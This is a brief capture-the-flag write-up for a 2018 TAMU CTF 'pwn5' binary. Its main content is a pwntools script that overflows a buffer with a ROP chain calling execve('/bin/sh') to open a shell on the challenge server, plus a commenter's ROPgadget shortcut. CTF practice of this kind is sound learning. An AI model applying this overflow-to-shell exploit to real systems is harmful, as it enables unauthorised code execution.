Rating:

**This script is intended to be just a shorter and more elegant solution, using the ROP pwntools's submodule.**
If you want to actually understand ROP attack (as I needed before this challenge), this is **not** the write-up you're looking for.

```
from pwn import *

conn = remote('pwn.ctf.tamu.edu', '4325')
#conn = process("./pwn5")

context.clear(arch='i386')
context.kernel = 'amd64'
binary = ELF('pwn5')

rop = ROP(binary)
binsh = 0x080f1a20 #global variable 'first_name'
rop.execve(binsh, 0, 0) #automatically makes gadgets for execve(binsh)
#lucky we had them in the code!
DIMBUFFER = 28

conn.sendline("/bin/sh") #saved in 'first_name'
conn.sendline(":P")
conn.sendline(":P")
conn.sendline("y")
conn.sendline("2")
#print str(rop)
conn.sendline(cyclic(DIMBUFFER+4) + str(rop))

conn.interactive() #enjoy your shell
```

kataryniarzFeb. 27, 2018, 1:12 a.m.

Look at this:
```
ROPgadget --binary ./pwn5 --ropchain
```
I just needed to add padding: `'a' * (0x1c + 4)`. That probably was the shortest solution.